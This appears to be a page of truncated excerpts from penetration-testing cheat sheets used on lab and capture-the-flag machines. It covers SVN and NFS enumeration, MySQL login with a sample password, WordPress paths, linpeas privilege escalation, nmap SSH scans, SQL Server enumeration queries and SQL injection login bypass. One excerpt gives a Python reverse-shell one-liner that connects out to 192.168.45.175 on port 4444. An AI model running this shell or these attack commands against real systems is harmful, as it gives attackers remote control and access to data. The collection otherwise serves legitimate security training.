Enumeration commands svn ls svn://10.10.10.203 #list svn log svn://10.10.10.203 #Commit history svn checkout svn://10.10.10.203 #Download the repository svn up -r 2 #Go to revision 2 inside the ch...

Connection Common command to connect MariaDB and MySQL databases (avoid -p if you want to be prompted for the password): mysql -h 10.129.5.43 -u root -p 'th1s!smypassw0rd' MySQL Basic Commands: ...

Default paths: index.php license.txt contains useful information such as the version WordPress installed. wp-activate.php is used for the email activation process when setting up a new WordP...

LinPeas We can use linpeas on UNIX derivatives such as Linux. ./linpeas.sh | tee output.txt Unix_privesc_check We can use unix_privesc_check on UNIX derivatives such as Linux. The script support...

Find recursively a string: # Find ETSCTF on every file under the current directory find . -type f -exec grep -H 'ETSCTF' {} \; 2>/dev/null # Identify any file (not directory) modified in the las...

Enumeration Cipher Algorithms supported: nmap -p22 10.10.1.3 --script ssh2-enum-algos Public key from ssh server: nmap -p22 10.10.1.3 --script ssh-hostkey --script-args= ssh_hostkey=full Review i...

NMAP Scan port and info on NFS nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.181.201 ... 111/tcp open rpcbind | nfs-showmount: |_ /var * | nfs-statfs: | Filesystem 1K-blocks Us...

Python python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.175",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),...

Simple Commands Simple enumeration is to be abused with following queries such queries where taken from PayloadAllTheThings: # Version SELECT @@version # DB user SELECT user_name(); SELECT system_u...

SQLi Authentication Bypass A SQL query for a normal login, then, looks like this: select * from users where name = 'tom' and password = 'jones'; If we control the value being passed in as $user, ...